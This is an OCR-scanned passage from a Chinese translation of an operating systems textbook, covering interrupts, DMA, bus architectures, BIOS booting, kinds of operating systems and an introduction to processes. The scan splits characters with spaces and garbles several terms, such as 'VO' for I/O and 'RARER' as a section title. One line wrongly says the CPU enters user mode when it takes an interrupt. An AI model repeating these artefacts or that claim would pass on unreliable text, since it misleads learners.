第 二 种 方式 是 设备 驱动 程序 启动 设备 并 且 让 该 设备 在 操作 完成 时 发 出 一 个 中 断 。 设 备 驱 动 程序 在 这 
个 时 刻 返 回 。 操 作 系统 接着 在 需要 时 阻塞 调用 者 并 安排 其 他 工作 进行 。 当 设备 驱动 程序 检测 到 该 设备 的 
操作 完毕 时 ， 它 发 出 一 个 中 断 通知 操作 完成 。 

在 操作 系统 中 ， 中 断 是 非常 重要 的 ， 所 以 需要 更 具体 地 讨论 。 在 图 1-11a 中 ， 有 一 个 IO 的 三 步 过 程 。 
在 第 1 步 ， 设 备 驱动 程序 通过 写 设 备 寄存 器 通知 设备 控制 器 做 什么 。 然 后 ， 设 备 控制 器 启动 该 设备 。 当 
设备 控制 器 传送 完毕 被 告知 要 进行 读 写 的 字 节 数量 后 ， 它 在 第 2 步 中 使 用 特定 的 总 线 发 信号 给 中 断 控 制 
器 芯片 。 如 果 中 断 控 制 器 已 经 准备 接收 中 断 〈 如 果 正 忙于 一 个 更 高 级 的 中 断 ， 也 可 能 不 接收 ) ， 它 会 在 
CPU 芯片 的 一 个 管 脚 上 声明 ， 这 就 是 第 3 步 。 在 第 4 步 中 ， 中 断 控制 器 把 该 设备 的 编号 放 到 总 线 上 ， 这 样 
CPU 可 以 读 总 线 ， 并 且 知 道 哪 个 设备 刚刚 完成 了 操作 (可 能 同时 有 许多 设备 在 运行 )。 








中 断 处 理 程序 
a) b) 


图 1-11 a) 启动 一 个 VO 设备 并 发 出 中 断 的 过 程 ，b) 中 断 处 理 过 程 包括 取 中 断 、 运 行 中 断 处 理 程序 和 返回 用 户 程序 
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一 旦 CPU 决定 取 中 断 ， 通 常 程 序 计 数 器 和 PSW 就 被 压 入 当前 堆栈 中 ， 并 且 CPU 被 切换 到 用 户 态 。 
设备 编号 可 以 成 为 部 分 内 存 的 一 个 引用 ， 用 于 寻找 该 设备 中 断 处 理 程序 的 地 址 。 这 部 分 内 存 称 为 中 断 向 
Æ (interrupt vector)。 当 中 断 处 理 程序 (中断 设备 的 设备 驱动 程序 的 一 部 分 ) 开始 后 ， 它 取 走 已 入 栈 的 
程序 计数 器 和 PSW ， 并 保存 之 ， 然 后 查询 设备 的 状态 。 在 中 断 处 理 程序 全 部 完成 之 后 ， 它 返回 到 先前 运 
行 的 用 户 程序 中 尚未 执行 的 头 一 条 指令 。 这 些 步 又 如 图 1-1lb 所 示 。 

第 三 种 方式 是 ， 为 IO 使 用 一 种 特殊 的 直接 存储 器 访问 (Direct Memory Access, DMA) 芯片 , 它 
可 以 控制 在 内 存 和 某 些 控制 器 之 间 的 位 流 ， 而 无 须 持续 的 CPU 干预 。CPU 对 DMA 芯 片 进 行 设置 ， 说 明 
需要 传送 的 字 节 数 、 有 关 的 设备 和 内 存 地 址 以 及 操作 方向 ， 接 着 启动 DMA。 当 DMA 芯 片 完成 时 ， 它 引 
发 一 个 中 断 ， 其 处 理 方式 如 前 所 述 。 有 关 DMA 和 IO 硬件 会 在 第 5 章 中 具体 讨论 。 

中 断 会 (并 且 经 常会 ) 在 非常 不 合适 的 时 刻 发 生 ， 比 如 ， 在 另 一 个 中 断 程序 正在 运行 时 发 生 。 正 由 
于 此 ，CPU 有 办 法 关闭 中 断 并 在 稍 后 再 开启 中 断 。 在 中 断 关 闭 时 ， 任 何 已 经 发 出 中 断 的 设备 ， 可 以 继续 
保持 其 中 断 信 号 ， 但 是 CPU 不 会 被 中 断 ， 直 至 中 断 再 次 启用 为 止 。 如 果 在 关闭 中 断 时 ， 已 有 多 个 设备 发 
出 了 中 断 ， 中 断 控 制 器 将 决定 先 处 理 哪个 中 断 ， 通 常 这 取决 于 事先 赋予 每 个 设备 的 静态 优先 级 。 最 高 优 
先 级 的 设备 赢得 竞争 并 且 首 先 获得 服务 ， 其 他 设备 则 必须 等 待 。 

1.3.5 总 线 

图 1-6 中 的 结构 在 小 型 计算 机 中 使 用 了 多 年 ， 并 用 在 早期 的 IBM PC 中 。 但 是 ， 随 着 处 理 器 和 存储 器 
速度 越 来 越 快 ， 到 了 某 个 转折 点 时 ， 单 总 线 (当然 还 有 IBM PC 总 线 ) 就 很 难处 理 总 线 的 交通 流量 了 ， 
只 有 放弃 。 其 结果 是 导致 其 他 的 总 线 出 现 ， 它 们 处 理 IO 设 备 以 及 CPU 到 存储 器 的 速度 都 更 快 。 这 种 演 
化 的 结果 是 ， 目 前 一 台大 型 x86 系 统 的 结构 如 图 1-12 所 示 。 





更 多 的 PCIe 设 各 
图 1-12 一 个 大 型 x86 系 统 的 结构 


图 中 的 系统 有 很 多 总 线 (例如 高 速 缓存 、 内 存 、PCIe、PCI、USB、SATA 和 DMI) ， 每 条 总 线 的 传 
输 速度 和 功能 都 不 同 。 操 作 系 统 必 须 了 解 所 有 总 线 的 配置 和 管理 。 其 中 主要 的 总 线 是 PCIe (Peripheral 
Component Interconnect Express) 总 线 。 

Intel 发 明 的 PCIe 总 线 是 陈旧 的 PCI 总 线 的 继承 者 ， 而 PCI 总 线 则 是 为 了 取代 原来 的 ISA (Industry 
Standard Architecture) 总 线 。 数 十 Gb/s 的 传输 能 力 使 得 PCIe 比 它 的 前 身 快 得 多 。 它 们 在 本 质 上 也 十 分 不 
同 。 直 到 发 明 PCIe 总 线 的 2004 年 ， 大 多 数 总 线 都 是 并 行 且 共享 的 。 共 享 总 线 架 构 (shared bus 
architecture) 表示 多 个 设备 使 用 一 些 相同 的 导线 传输 数据 。 因 此 ， 当 多 个 设备 同时 需要 发 送 数据 时 ， 需 
要 仲裁 器 决定 哪个 设备 可 以 使 用 总 线 。PCIe 恰 好 相反 ， 它 使 用 分 离 的 端 到 端的 链 路 。 传 统 PCI 使 用 的 并 
行 总 线 架构 (parallel bus architecture) 表示 通过 多 条 导线 发 送 数据 的 每 一 个 字 。 例 如 ， 在 传统 的 PCI 总 
线 上 ， 一 个 32 位 数据 通过 32 条 并 行 的 导线 发 送 。 与 之 相反 ，PCIe 使 用 串 行 总 线 架 构 (serial bus 
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architecture) ， 通 过 一 条 被 称 为 数据 通路 的 链 路 传递 集合 了 所 有 位 的 一 条 消息 ， 这 非常 像 网 络 包 。 这 样 
做 简单 了 很 多 ， 因 为 不 用 再 确保 所 有 32 位 在 同一 时 刻 精确 地 到 达 目 的 地 。 通过 将 多 个 数据 通路 并 行 起 来 ， 
并 行 性 仍 可 有 效 利 用 。 例 如 ， 可 以 使 用 32 个 数据 通路 并 行 传输 32 条 消息 。 随 着 网 卡 和 图 形 适配器 这 些 外 
围 设备 速度 的 迅速 增长 ，PCIe 标 准 每 3~5 年 进行 一 次 更 新 。 例 如 ，PCIe 2.0 规 格 的 16 个 数据 通路 提供 
64Gb/s 的 速度 ， 升 级 到 PCIe 3.0 后 会 提速 2 倍 ， 而 PCIe 4.0 会 再 提速 2 倍 。 

同时 ， 还 有 很 多 符合 老 的 PCI 标 准 的 旧 设 备 。 正 如 我 们 在 图 1-12 中 看 到 的 那样 ， 这 些 设备 连接 到 独 
立 的 集成 处 理 器 。 未 来 ， 当 我 们 觉得 用 “陈旧 ”已 经 不 能 形容 PCI， 而 只 能 称 其 为 “古老 ”时 ， 很 可 能 
所 有 的 PCI 设 备 将 连接 到 另 一 个 集成 中 心 ， 这 些 中 心 再 连接 到 主 集成 中 心 ， 从 而 形成 总 线 树 。 

在 图 中 ，CPU 通 过 DDR3 总 线 与 内 存 对 话 ， 通 过 PCIe 总 线 与 外 围 图 形 设备 对 话 ， 通 过 DMI (Direct 
Media Interface) 总 线 经 集成 中 心 与 所 有 其 他 设备 对 话 。 而 集成 中 心 通过 通用 串 行 总 线 与 USB 设 备 对 话 ， 
通过 SATA 总 线 与 硬盘 和 DVD 驱动 器 对 话 ， 通 过 PCIe 传 输 以 太 网 络 帧 。 我 们 已 经 提 到 过 使 用 传统 PCI 总 线 
的 旧 的 PCI 设 备 。 

不 仅 如 此 ， 每 一 个 核 不 仅 有 独立 的 高 速 缓存 ， 而 且 还 共享 一 个 大 得 多 的 高 速 缓 存 。 每 一 种 高 速 缓存 
都 引入 了 又 一 条 总 线 。 

USB (Universal Serial Bus) 是 用 来 将 所 有 慢 速 /0 设备 (如 键盘 和 鼠标 ) 与 计算 机 连接 的 。 然 而 ， 
以 5Gb/s 运 行 的 现代 USB 3.0 设 备 被 认为 很 慢 ， 这 对 于 伴随 第 一 代 IBM 个 人 计算 机 (以 8Mb/s ISA 作 为 主要 
总 线 ) 共 同 长 大 的 人 来 说 似乎 并 不 自然 。USB 采 用 一 种 小 型 的 4~11 针 (取决 于 版 本 ) 连接 器 ， 其 中 一 些 
针 为 USB 设 备 提 供电 源 或 者 接地 。USB 是 一 种 集中 式 总 线 ， 其 根 设备 每 1ms 轮 询 一 次 IO 设备 ， 看 是 否 有 
信息 收发 。USB 1.0 可 以 处 理 总 计 12Mby/s 的 负载 ，USB 2.0 总 线 提速 到 480Mb/s， 而 USB 3.0 能 达到 不 小 
于 5Gb/s 的 速率 。 所 有 USB 设 备 都 可 以 连接 到 计算 机 然后 立即 工作 ， 而 不 像 之 前 的 设备 那样 要 求 重启 ， 
这 让 一 批 诅 趟 的 用 户 感到 非常 惊讶 。 

SCSI (Small Computer System Interface) 总 线 是 一 种 高 速 总 线 ， 用 在 高 速 硬盘 、 扫 描 仪 和 其 他 需 
要 较 大 带宽 的 设备 上 。 现 在 ， 它 们 主要 用 在 服务 器 和 工作 站 中 ， 速 度 可 以 达到 640MB/s。 

要 在 如 图 1-12 展 示 的 环境 下 工作 ， 操 作 系统 必须 了 解 有 些 什 么 外 部 设备 连接 到 计算 机 上 ， 并 对 它们 
进行 配置 。 这 种 需求 导致 Intel 和 微软 设计 了 一 种 名 为 即 插 即 用 (plug and play) 的 IO 系统 ， 这 是 基于 一 
种 首先 被 苹果 Macintosh 实 现 的 类 似 概念 。 在 即 插 即 用 之 前 ， 每 块 JO 卡 有 一 个 固定 的 中 断 请 求 级 别 和 用 
于 其 IO 寄存 器 的 固定 地 址 ， 例 如 ， 键 盘 的 中 断 级 别 是 1， 并 使 用 0x60 至 0x64 的 IO 地 址 ， 软 盘 控 制 器 是 
中 断 6 级 并 使 用 0x3F0 至 0x3F7 的 IO 地 址 ， 而 打印 机 是 中 断 7 级 并 使 用 0x378 至 0x37A 的 IO 地 址 等 。 

到 目前 为 止 ， 一 切 正常 。 比 如 ， 用 户 买 了 一 块 声卡 和 调制 解 调 卡 ， 并 且 它 们 都 是 可 以 使 用 中 断 4 的 ， 
但 此 时 ， 问 题 发 生 了 ， 两 块 卡 互相 冲突 ， 结 果 不 能 在 一 起 工作 。 解 决 方案 是 在 每 块 1O 卡 上 提供 DIP 开 关 
或 跳 接 器 ， 并 指导 用 户 对 其 进行 设置 以 选择 中 断 级 别 和 I/O 地 址 ， 使 其 不 会 与 用 户 系统 的 任何 其 他 部 件 
冲突 。 那 些 热衷 于 复杂 PC 硬件 的 十 几 岁 的 青少年 有 时 可 以 不 出 差错 地 做 这 类 工作 。 但 是 ， 没 有 人 能 够 不 
出 错 。 

即 插 即 用 所 做 的 工作 是 ， 系 统 自动 地 收集 有 关 IO 设 备 的 信息 ， 集 中 赋予 中 断 级 别 和 IO 地 址 ， 然 后 
通知 每 块 卡 所 使 用 的 数值 。 这 项 工作 与 计算 机 的 启动 密切 相关 ， 所 以 下 面 我 们 开始 讨论 计算 机 的 启动 。 
不 过 这 不 是 件 轻松 的 工作 。 

1.3.6 启动 计算 机 

简要 启动 过 程 如 下 。 在 每 台 计 算 机 上 有 一 块 双亲 板 (在 政治 因素 影响 到 计算 机 产业 之 前 ， 它 们 曾 称 
为 “ 母 板 ")。 在 双亲 板 上 有 一 个 称 为 基本 输入 输出 系统 (Basic Input Output System, BIOS) 的 程序 。 
在 BIOS 内 有 底层 UO 软件 ， 包 括 读 键盘 、 写 屏幕 、 进 行 磁盘 WO 以 及 其 他 过 程 。 现 在 这 个 程序 存放 在 一 块 
闪 速 RAM 中 ， 它 是 非 易 失 性 的 ， 但 是 在 发 现 BIOS 中 有 错时 可 以 通过 操作 系统 对 它 进行 更 新 。 

在 计算 机 启动 时 ，BIOS 开 始 运行 。 它 首先 检查 所 安装 的 RAM 数 量 ， 键 盘 和 其 他 基本 设备 是 否 已 安 
装 并 正常 响应 。 接 着 ， 它 开始 扫描 PCIe 和 PCI 总 线 并 找 出 连 在 上 面 的 所 有 设备 。 即 插 即 用 设备 也 被 记录 
下 来 。 如 果 现 有 的 设备 和 系统 上 一 次 启动 时 的 设备 不 同 ， 则 新 的 设备 将 被 配置 。 

然后 ，BIOS 通 过 尝试 存储 在 CMOS 存 储 器 中 的 设备 清单 决定 启动 设备 。 用 户 可 以 在 系统 刚 启动 之 
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后 进入 一 个 BIOS 配 置 程序 ， 对 设备 清单 进行 修改 。 典 型 地 ， 如 果 存 在 CD-ROM (有 时 是 USB) ， 则 系统 
试图 从 中 启动 ， 如 果 失 败 ， 系 统 将 从 硬盘 启动 。 启 动 设 备 上 的 第 一 个 遍 区 被 读 和 内存 并 执行 。 这 个 扇 区 
中 包含 一 个 对 保存 在 启动 扁 区 末尾 的 分 区 表 检查 的 程序 ， 以 确定 哪个 分 区 是 活动 的 。 然 后 ， 从 该 分 区 读 
入 第 二 个 启动 装载 模块 。 来 自 活动 分 区 的 这 个 装载 模块 被 读 入 操作 系统 ， 并 启动 之 。 

然后 ， 操 作 系 统 询 问 BIOS， 以 获得 配置 信息 。 对 于 每 种 设备 ， 系 统 检 查 对 应 的 设备 驱动 程序 是 否 
存在 。 如 果 没 有 ， 系 统 要 求 用 户 插 入 含有 该 设备 驱动 程序 的 CD-ROM (由 设备 供应 商 提 供 ) 或 者 从 网 络 
上 下 载 驱 动 程序 。 一 旦 有 了 全 部 的 设备 驱动 程序 ， 操 作 系 统 就 将 它们 调 入 内 核 。 然 后 初始 化 有 关 表 格 ， 
创建 需要 的 任何 背景 进程 ， 并 在 每 个 终端 上 启动 登录 程序 或 GUI。 


1.4 操作 系统 大 观 园 
操作 系统 已 经 存在 了 半 个 多 世纪 。 在 这 段 时 期 内 ， 出 现 了 各 种 类 型 的 操作 系统 ， 但 并 不 是 所 有 操作 
系统 都 很 知名 。 本 节 中 ， 我 们 将 简要 地 介绍 其 中 的 9 个 。 在 本 书 的 后 面 ， 我 们 还 将 回顾 其 中 的 一 些 类 型 。 


1.4.1 大 型 机 操作 系统 

在 操作 系统 的 高 端 是 用 于 大 型 机 的 操作 系统 ， 这 些 房 间 般 大 小 的 计算 机 仍然 可 以 在 一 些 大 型 公司 的 
数据 中 心 见 到 。 这 些 计算 机 与 个 人 计算 机 的 主要 差别 是 其 1/O 处 理 能 力 。 一 台 拥 有 1000 个 磁盘 和 几 百 万 
吉 字 节 数 据 的 大 型 机 是 很 正常 的 ， 如 果 有 这 样 一 台 个 人 计算 机 朋友 会 很 羡 莫 。 大 型 机 也 在 高 端的 Web 服 
务 器 、 大 型 电子 商务 服务 站 点 和 事务 一 事务 交易 服务 器 上 有 某 种 程度 的 卷土重来 。 

用 于 大 型 机 的 操作 系统 主要 面向 多 个 作业 的 同时 处 理 ， 多 数 这 样 的 作业 需要 巨大 的 IO 能 力 。 系 统 
主要 提供 三 类 服务 : 批 处 理 、 事 务 处 理 和 分 时 。 批 处 理 系统 处 理 不 需要 交互 式 用 户 干预 的 周期 性 作业 。 
保险 公司 的 索赔 处 理 或 连锁 商店 的 销售 报告 通常 就 是 以 批 处 理 方 式 完成 的 。 事 务 处 理 系统 负责 大 量 小 的 
请 求 ， 例 如 ， 银 行 的 支票 处 理 或 航班 预订 。 每 个 业务 量 都 很 小 ,但 是 系统 必须 每 秒 处 理 成 百 上 千 个 业务 。 
分 时 系统 允许 多 个 远程 用 户 同时 在 计算 机 上 运行 作业 ， 如 在 大 型 数据 库 上 的 查询 。 这 些 功能 是 密切 相关 
的 , 大 型 机 操作 系统 通常 完成 所 有 这 些 功能 。 大 型 机 操作 系统 的 一 个 例子 是 OS/390 (OS/360 的 后 继 版 本 )。 
但 是 ， 大 型 机 操作 系统 正在 逐渐 被 诸如 Linux 这 类 UNIX 的 变 体 所 替代 。 


1.4.2 ”服务 器 操作 系统 

下 一 个 层次 是 服务 器 操作 系统 。 它 们 在 服务 器 上 运行 ， 服 务 器 可 以 是 大 型 的 个 人 计算 机 、 工 作 站 ， 
甚至 是 大 型 机 。 它 们 通过 网 络 同时 为 若干 个 用 户 服务 ， 并 且 人 允许 用 户 共享 硬件 和 软件 资源 。 服 务 器 可 提 
供 打 印 服务 、 文 件 服 务 或 Web 服 务 。Internet 提 供 商 运行 着 许多 台 服 务 器 机 器 ， 为 用 户 提供 支持 ， 使 Web 
站 点 保存 Web 页 面 并 处 理 进 来 的 请 求 。 典 型 的 服务 器 操作 系统 有 Solaris、FreeBSD、Linux 和 Windows 
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1.4.3 多 处 理 器 操作 系统 

获得 大 量 联合 计算 能 力 的 常用 方式 是 将 多 个 CPU 连接 成 单个 的 系统 。 依 据 连接 和 共享 方式 的 不 同 ， 
这 些 系统 称 为 并 行 计算 机 、 多 计算 机 或 多 处 理 器 。 它 们 需要 专门 的 操作 系统 ， 不 过 通常 采用 的 操作 系统 
是 配 有 通信 、 连 接 和 一 致 性 等 专门 功能 的 服务 器 操作 系统 的 变 体 。 

个 人 计算 机 中 近来 出 现 了 多 核 芯 片 ， 所 以 常规 的 台式 机 和 笔记 本 电脑 操作 系统 也 开始 与 小 规模 的 多 
处 理 器 打交道 ， 而 核 的 数量 正在 与 时 俱 进 。 幸 运 的 是 ， 由 于 先前 多 年 的 研究 ， 已 经 具备 不 少 关于 多 处 理 
器 操作 系统 的 知识 ， 将 这 些 知识 运用 到 多 核 处 理 器 系统 中 应 该 不 存在 困难 。 难 点 在 于 要 有 能 够 运用 所 有 
这 些 计 算 能 力 的 应 用 。 许 多 主流 操作 系统 ， 包 括 Windows 和 Linux， 都 可 以 运行 在 多 核 处 理 器 上 。 


1.4.4 个 人 计算 机 操作 系统 

接着 一 类 是 个 人 计算 机 操作 系统 。 现 代 个 人 计算 机 操作 系统 都 支持 多 道 程 序 处 理 ， 在 启动 时 ， 通 常 
有 几 十 个 程序 开始 运行 。 它 们 的 功能 是 为 单个 用 户 提供 良好 的 支持 。 这 类 系统 广泛 用 于 字 处 理 、 电 子 表 
格 、 游 戏 和 Internet 访 问 。 常 见 的 例子 是 Linux、FreeBSD、Windows 7, Windows 8 和 苹果 公司 的 OS X, 
个 人 计算 机 操作 系统 是 如 此 地 广为人知 ， 所 以 不 需要 再 做 介绍 了 。 事 实 上 ， 许 多 人 甚至 不 知道 还 有 其 他 
的 操作 系统 存在 。 
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1.4.5 掌上 计算 机 操作 系统 

随 着 系统 越 来 越 小 型 化 ， 我 们 看 到 了 平板 电脑 、 智 能 手机 和 其 他 掌上 计算 机 系统 。 掌 上 计算 机 或 者 
PDA (个 人 数字 助理 ，Personal Digital Assistant) 是 一 种 可 以 担 在 手中 操作 的 小 型 计算 机 。 平 板 电脑 和 
智能 手机 是 最 为 人 熟知 的 例子 。 正 如 我 们 看 到 的 那样 ， 这 部 分 市 场 已 经 被 谷歌 的 Android 系 统 和 苹果 的 
iOS 主 导 ， 但 它们 仍 有 很 多 竞争 对 手 。 大 多 数 设备 基于 的 是 多 核 CPU、GPS、 摄 像 头 及 其 他 的 传感器 、 
大 量 内存 和 精密 的 操作 系统 。 并 且 ， 它 们 都 有 多 到 数 不 清 的 第 三 方 应 用 (app). 


1.4.6 RARER 

嵌入 式 系统 在 用 来 控制 设备 的 计算 机 中 运行 ， 这 种 设备 不 是 一 般 意义 上 的 计算 机 ， 并 且 不 允许 用 户 
安装 软件 。 典 型 的 例子 有 微波 炉 、 电 视 机 、 汽 车 、DVD 刻 录 机 、 移 动 电话 以 及 MP3 播 放 器 一 类 的 设备 。 
区 别 嵌 入 式 系统 与 掌上 设备 的 主要 特征 是 ， 不 可 信 的 软件 肯定 不 能 在 伐 入 式 系统 上 运行 。 用 户 不 能 给 自 
己 的 微波 炉 下 载 新 的 应 用 程序 一 一 所 有 的 软件 都 保存 在 ROM 中 。 这 意味 着 在 应 用 程序 之 间 不 存在 保护 ， 
这 样 系统 就 获得 了 某 种 简化 。 在 这 个 领域 中 ， 主 要 的 戏 入 式 操 作 系统 有 伐 入 式 Linux、QNX 和 VxWorks 等 。 


1.4.7 传感器 节点 操作 系统 

有 许多 用 途 需 要 配置 微小 传感器 节点 网 络 。 这 些 节 点 是 一 种 可 以 彼此 通信 并 且 使 用 无 线 通信 基站 的 
微型 计算 机 。 这 类 传感器 网 络 可 以 用 于 建筑 物 周 边 保护 、 国 土 边界 保卫 、 森 林 火 灾 探 测 、 气 象 预测 用 的 
温度 和 降水 测量 、 战 场 上 敌 方 运动 的 信息 收集 等 。 

传感器 是 一 种 内 建 有 无 线 电 的 电池 驱动 的 小 型 计算 机 。 它 们 能 源 有 限 ， 必 须 长 时 间 工 作 在 无 人 的 户 
外 环境 中 ， 通 常 是 恶劣 的 条 件 下 。 其 网 络 必须 足够 健壮 ， 以 允许 个 别 节点 失效 。 随 着 电池 开始 耗 尽 ， 这 
种 失效 市 点 会 不 断 增 加 。 

每 个 传感器 节点 是 一 个 配 有 CPU、RAM、ROM 以 及 一 个 或 多 个 环境 传感器 的 实 实在 在 的 计算 机 。 
节点 上 运行 一 个 小 型 但 是 真实 的 操作 系统 ， 通 常 这 个 操作 系统 是 事件 驱动 的 ， 可 以 响应 外 部 事件 ， 或 者 
基于 内 部 时 钟 进行 周期 性 的 测量 。 该 操作 系统 必须 小 且 简 单 ， 因 为 这 些 节点 的 RAM 很 小 ， 而 且 电池 者 
命 是 一 个 重要 问题 。 另 外 ， 和 舱 入 式 系统 一 样 ， 所 有 的 程序 是 预先 装载 的 ， 用 户 不 会 突然 启动 从 Internet 
上 下 载 的 程序 ， 这 样 就 使 得 设计 大 为 简化 。TinyOS 是 一 个 用 于 传感器 节点 的 知名 操作 系统 。 


1.4.8 实时 操作 系统 

另 一 类 操作 系统 是 实时 操作 系统 。 这 些 系统 的 特征 是 将 时 间作 为 关键 参数 。 例 如 ， 在 工业 过 程控 制 
系统 中 ， 工 厂 中 的 实时 计算 机 必须 收集 生产 过 程 的 数据 并 用 有 关 数 据 控制 机 器 。 通 常 ， 系 统 还 必须 满足 
严格 的 最 终 时 限 。 例 如 ， 汽 车 在 装配 线 上 移动 时 ， 必 须 在 限定 的 时 间 内 进行 规定 的 操作 。 如 果 焊 接 机 器 
人 焊接 得 太 早 或 太 迟 ， 都 会 毁坏 汽车 。 如 果 某 个 动作 必须 绝对 地 在 规定 的 时 刻 (或 规定 的 时 间 范 围 ) 发 
生 ， 这 就 是 硬 实时 系统 。 可 以 在 工业 过 程控 制 、 民 用 航空 、 军 事 以 及 类 似 应 用 中 看 到 很 多 这 样 的 系统 。 
这 些 系统 必须 提供 绝对 保证 ， 让 某 个 特定 的 动作 在 给 定 的 时 间 内 完成 。 

另 一 类 实时 系统 是 软 实时 系统 ， 在 这 种 系统 中 ， 虽 然 不 希望 偶尔 违反 最 终 时 限 ， 但 仍 可 以 接受 ， 并 
且 不 会 引起 任何 永久 性 的 损害 。 数 字音 频 或 多 媒体 系统 就 是 这 类 系统 。 智 能 手机 也 是 软 实时 系统 。 

由 于 在 (E) 实时 系统 中 满足 严格 的 时 限 是 关键 ， 所 以 操作 系统 就 是 一 个 简单 的 与 应 用 程序 链接 的 
库 ， 各 个 部 分 必须 紧密 耦合 并 且 和 披 此 之 间 设 有 保护 。 这 种 实时 系统 的 例子 有 eCos 。 

掌上 、 骨 入 式 以 及 实时 系统 的 分 类 之 间 有 不 少 是 彼此 重重 的 。 几 乎 所 有 这 些 系统 至 少 存在 某 种 软 实 
时 情景 。 典 入 式 和 实时 系统 只 运行 系统 设计 师 安 装 的 软件 ， 用 户 不 能 添加 自己 的 软件 ， 这 样 就 使 得 保护 
工作 很 容易 。 掌 上 和 人 航 人 式 系统 是 给 普通 消费 者 使 用 的 ， 而 实时 系统 则 更 多 用 于 工业 领域 。 无 论 怎样 ， 
这 些 系 统 确实 存在 一 些 共同 点 。 


1.4.9 智能 卡 操作 系统 

最 小 的 操作 系统 运行 在 智能 卡 上 。 智 能 卡 是 一 种 包含 一 块 CPU 芯片 的 信用 卡 。 它 有 非常 严格 的 运行 
能 耗 和 存储 空间 的 限制 。 其 中 ， 有 些 智 能 卡 只 具有 单项 功能 ， 如 电子 支付 ， 但 是 其 他 的 智能 卡 则 拥有 多 
项 功能 ， 它 们 有 专用 的 操作 系统 。 

有 些 智能 卡 是 面向 Java 的 。 这 意味 着 在 智能 卡 的 ROM 中 有 一 个 Java 虚 拟 机 (Java Virtual Machine, 
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JVM) 解释 器 。Java 小 程序 被 下 载 到 卡 中 并 由 JVM 解 释 器 解释 。 有 些 卡 可 以 同时 处 理 多 个 Java 小 程序 ， 
这 就 是 多 道 程序 ， 并 且 需 要 对 它们 进行 调度 。 在 两 个 或 多 个 小 程序 同时 运行 时 ， 资 源 管 理 和 保护 就 成 为 
突出 的 问题 。 这 些 问题 必须 由 卡 上 的 操作 系统 (通常 是 非常 原始 的 ) 处 理 。 


1.5 操作 系统 概念 

多 数 操作 系统 都 使 用 某 些 基 本 概念 和 抽象 ， 如 进程 、 地 址 空间 以 及 文件 等 ， 它 们 是 需要 理解 的 核心 
内 容 。 作 为 引 论 ， 在 下 面 的 几 节 中 ， 我 们 将 较为 简要 地 考察 这 些 基 本 概念 中 的 一 部 分 。 在 本 书 的 后 面 ， 
我 们 将 详细 地 讨论 它们 。 为 了 说 明 这 些 概念 ， 我 们 有 时 使 用 示例 ， 这 些 示例 通常 源 自 UNIX。 不 过 ， 类 
似 的 例子 在 其 他 操作 系统 中 也 明显 地 存在 ， 我 们 将 在 之 后 深入 了 解 其 中 的 一 些 操作 系统 。 


1.5.1 进程 

在 所 有 操作 系统 中 ， 一 个 重要 的 概念 是 进程 (process)。 进 程 本 质 上 是 正在 执行 的 一 个 程序 。 与 每 
个 进程 相关 的 是 地 址 空间 (address space)， 这 是 从 某 个 最 小 值 的 存储 位 置 (通常 是 零 ) 到 某 个 最 大 值 的 
存储 位 置 的 列表 。 在 这 个 地 址 空间 中 ， 进 程 可 以 进行 读 写 。 该 地 址 空间 中 存放 有 可 执行 程序 、 程 序 的 数 
据 以 及 程序 的 堆栈 。 与 每 个 进程 相关 的 还 有 资源 集 ， 通 常 包括 寄存 器 (含有 程序 计数 器 和 堆栈 指针 )、 
打开 文件 的 清单 、 突 出 的 报警 、 有 关 进 程 清单 ， 以 及 运行 该 程序 所 需要 的 所 有 其 他 信息 。 进 程 基本 上 是 
容纳 运行 一 个 程序 所 需要 所 有 信息 的 容器 。 

进程 的 概念 将 在 第 2 章 详细 讨论 ， 不 过 ， 对 进程 建立 一 种 直观 感觉 的 最 便利 方式 是 分 析 一 个 多 道 程 
序 设计 系统 。 用 户 启动 一 个 视频 编辑 程序 , 指示 它 按照 某 个 格式 转换 一 小 时 的 视频 (有 时 会 花费 数 小 时 )， 
然后 离开 去 浏览 网 页 。 同时 ， 一 个 被 周期 性 唤醒 、 用 来 检查 进来 的 电子 邮件 的 后 台 进 程 会 开始 运行 。 这 
样 ， 我 们 就 有 了 (至 少 ) 三 个 活动 进程 : 视频 编辑 器 、Web 浏 览 器 以 及 电子 邮件 接收 程序 。 操 作 系统 周 
期 性 地 挂 起 一 个 进程 然后 启动 运行 另 一 个 进程 ， 这 可 能 是 由 于 在 过 去 的 一 两 秒 钟 内 ， 第 一 个 进程 已 使 用 
完 分 配给 它 的 时 间 片 。 

一 个 进程 暂时 被 挂 起 后 ， 在 随后 的 某 个 时 刻 里 ， 该 进程 再 次 启动 时 的 状态 必须 与 先前 暂停 时 完全 相 
同 ， 这 就 意味 着 在 挂 起 时 该 进程 的 所 有 信息 都 要 保存 下 来 。 例 如 ， 为 了 同时 读 和 信息， 进程 打开 了 若干 
文件 。 与 每 个 被 打开 文件 有 关 的 是 指向 当前 位 置 的 指针 ( 即 下 一 个 将 读 出 的 字 节 或 记录 )。 在 一 个 进程 
暂时 被 挂 起 时 ， 所 有 这 些 指针 都 必须 保存 起 来 ， 这 样 在 该 进程 重新 启动 之 后 ， 所 执行 的 读 调用 才能 读 到 
正确 的 数据 。 在 许多 操作 系统 中 ， 与 一 个 进程 有 关 的 所 有 信息 ， 除 了 该 进程 自身 地 址 空间 的 内 容 以 外 ， 
均 存 放 在 操作 系统 的 一 张 表 中 ， 称 为 进程 表 (process table) ， 进 程 表 是 数组 (或 链表 ) 结构 ， 当 前 存在 
的 每 个 进程 都 要 占用 其 中 一 项 。 

所 以 ,一 个 ( 挂 起 的 ) 进程 包括 : 进程 的 地 址 空间 (往往 称 作 磁 芯 映像 ，core image， 纪 念 过 去 
使 用 的 磁 芯 存储 器 ) ， 以 及 对 应 的 进程 表 项 (其 中 包括 寄存 器 以 及 稍 后 重启 动 该 进程 所 需要 的 许多 其 他 
信息 )。 

与 进程 管理 有 关 的 最 关键 的 系统 调用 是 那些 进行 进程 创建 和 进程 终止 的 系统 调用 。 考 虑 一 个 典型 的 
例子 。 有 一 个 称 为 命令 解释 器 (command interpreter) 或 shell 的 进程 从 终端 上 读 命令 。 此 时 ， 用 户 刚 键 
入 一 条 命令 要 求 编译 一 个 程序 。shell 必 须 先 创建 一 个 新 进程 来 执行 编译 程序 。 当 执行 编译 的 进程 结束 时 ， 


它 执 行 一 个 系统 调用 来 终止 自己 。 @ 

若 一 个 进程 能 够 创建 一 个 或 多 个 进程 〈 称 为 子 进程 ) ， 
而 且 这 些 进程 又 可 以 创建 子 进程 ， 则 很 容易 得 到 进程 树 ， G) O 
如 图 1-13 所 示 。 合 作 完成 某 些 作业 的 相关 进程 经 常 需要 彼 
